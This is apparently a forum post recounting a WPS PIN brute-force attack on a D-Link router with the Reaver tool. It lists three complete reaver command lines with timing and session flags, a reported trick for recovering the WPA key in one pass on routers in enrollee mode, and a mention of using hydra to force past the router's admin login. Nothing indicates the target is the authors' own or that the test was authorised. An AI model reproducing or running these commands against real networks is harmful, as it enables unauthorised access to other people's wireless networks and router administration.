First attempts at cracking this D-Link Router with Reaver seemed to be blocked by the firmware. Note the RSSI was 67 so signal strength was not an issue.We tried;
reaver -i mon0 -a -f -c 13 -b 6C:19:8F:XX:XX:XX -vv --mac=00:11:22:33:44:55
The router would provide two(2) or three(3) pins and then freeze for a long period.
Next we employed the command line:
reaver -i mon0 -b 6C:19:8F:XX:XX:XX -E -S -vv -T 1 -t 20 -d 0 -l 420 -x 30 -r 2:30 --mac=00:11:22:33:44:55
Pin harvesting was good but the router ran up to 99:99% and spun at that number requesting pins endlessly. We started a new session and ran it up to 99:99% twice more with the same results.
After a rethink we focused on the -S dh-small. We removed the -S -a and -f from the command line and ran:
reaver -i mon0 -b 6C:19:8F:XX:XX:XX -E -vv -T 1 -t 20 -d 0 -l 420 -x 30 -r 2:30 --mac=00:11:22:33:44:55
Removing the -a forced reaver to ask if we wanted to restore previous session. We selected n ie NO.
We got the key in one(1) pass BUT the WPS key was 12345670 according to reaver. This intrigued us so we logged onto the router using the WPA key provided by reaver, got association then hacked past the routers login page with hydra and went straight to the WPS page
1. The WPS system was active
2. The WPS mode was Enrollee
3. No wps pin was seen
This may mean that:
1. DLink Routers in the enrolle mode might by hacked by running thru the pins to 99:99% using the dh-small then remove the -S and -a which will force reaver to ask if you want to restore the old session. Say no and run the attack again.
OR
2. Just running the command line:
reaver -i mon0 -b 6C:19:8F:XX:XX:XX -E -vv -T 1 -t 20 -d 0 -l 420 -x 30 -r 2:30 --mac=00:11:22:33:44:55
against this router if in enrollee mode will crack the code in one iteration.
MTC